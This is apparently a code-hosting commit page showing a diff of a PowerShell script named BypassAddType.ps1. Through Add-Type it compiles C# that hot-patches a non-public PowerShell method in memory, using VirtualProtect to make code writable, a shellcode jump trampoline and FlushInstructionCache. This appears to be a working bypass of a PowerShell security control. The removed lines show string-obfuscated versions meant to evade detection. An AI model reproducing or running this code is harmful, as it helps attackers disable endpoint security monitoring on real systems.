Spaces:

enotkrutoy
/

gggg

Runtime error

App Files Files Community

enotkrutoy commited on Jan 23

Commit

74065b6

verified ·

1 Parent(s): c5b9d82

Rename test/BypassAddTypeO.ps1 to test/BypassAddType.ps1

Browse files

Files changed (1) hide show

test/{BypassAddTypeO.ps1 → BypassAddType.ps1} +11 -6

test/{BypassAddTypeO.ps1 → BypassAddType.ps1} RENAMED Viewed

@@ -1,4 +1,4 @@
-${q`PJ`D3v} =[typE]("{2}{3}{0}{1}"-F 'hod','S','eD','ITOr.mET'); ${Co`dE} = @"
 using System;
 using System.ComponentModel;
 using System.Management.Automation;
@@ -10,7 +10,7 @@ using System.Text;
 namespace Editor {
     public static class Methods {
         public static void Patch() {
-            MethodInfo original = typeof(PSObject).Assembly.GetType(Methods.CLASS).GetMethod(Methods.METHOD, BindingFlags.NonPublic | Static);
             MethodInfo replacement = typeof(Methods).GetMethod("Dummy", BindingFlags.NonPublic | BindingFlags.Static);
             Methods.Patch(original, replacement);
         }
@@ -32,7 +32,7 @@ namespace Editor {
             //Generate architecture specific shellcode
             byte[] patch = null;
             if (IntPtr.Size == 8) {
-                patch = new byte[] { 0x49, 0xbb, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x41, 0xff, 0xe3 };
                 byte[] address = BitConverter.GetBytes(replacementSite.ToInt64());
                 for (int i = 0; i < address.Length; i++) {
                     patch[i + 2] = address[i];
@@ -46,7 +46,7 @@ namespace Editor {
             }
             //Temporarily change permissions to RWE
-            uint oldprotect = 0;
             if (!VirtualProtect(originalSite, (UIntPtr)patch.Length, 0x40, out oldprotect)) {
                 throw new Win32Exception();
             }
@@ -57,6 +57,11 @@ namespace Editor {
                 throw new Win32Exception();
             }
             //Restore the original memory protection settings
             if (!VirtualProtect(originalSite, (UIntPtr)patch.Length, oldprotect, out oldprotect)) {
                 throw new Win32Exception();
@@ -89,5 +94,5 @@ namespace Editor {
     }
 }
 "@
-.("{0}{1}" -f 'Add-','Type') ${C`OdE}
-  (  .("{2}{0}{1}{3}"-f 'E','T-ChiLDit','G','eM') ('VA'+'RIaB'+'le:QPj'+'D3v')  )."vAl`Ue"::("{1}{0}"-f'ch','Pat').Invoke()

+$code = @"
 using System;
 using System.ComponentModel;
 using System.Management.Automation;
 namespace Editor {
     public static class Methods {
         public static void Patch() {
+            MethodInfo original = typeof(PSObject).Assembly.GetType(Methods.CLASS).GetMethod(Methods.METHOD, BindingFlags.NonPublic | BindingFlags.Static);
             MethodInfo replacement = typeof(Methods).GetMethod("Dummy", BindingFlags.NonPublic | BindingFlags.Static);
             Methods.Patch(original, replacement);
         }
             //Generate architecture specific shellcode
             byte[] patch = null;
             if (IntPtr.Size == 8) {
+                patch = new byte[] { 0x49, 0xbb, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x41, 0xff, 0xe3 };
                 byte[] address = BitConverter.GetBytes(replacementSite.ToInt64());
                 for (int i = 0; i < address.Length; i++) {
                     patch[i + 2] = address[i];
             }
             //Temporarily change permissions to RWE
+            uint oldprotect;
             if (!VirtualProtect(originalSite, (UIntPtr)patch.Length, 0x40, out oldprotect)) {
                 throw new Win32Exception();
             }
                 throw new Win32Exception();
             }
+            //Flush insutruction cache to make sure our new code executes
+            if (!FlushInstructionCache(GetCurrentProcess(), originalSite, (UIntPtr)patch.Length)) {
+                throw new Win32Exception();
+            }
             //Restore the original memory protection settings
             if (!VirtualProtect(originalSite, (UIntPtr)patch.Length, oldprotect, out oldprotect)) {
                 throw new Win32Exception();
     }
 }
 "@
+Add-Type $code
+[Editor.Methods]::Patch()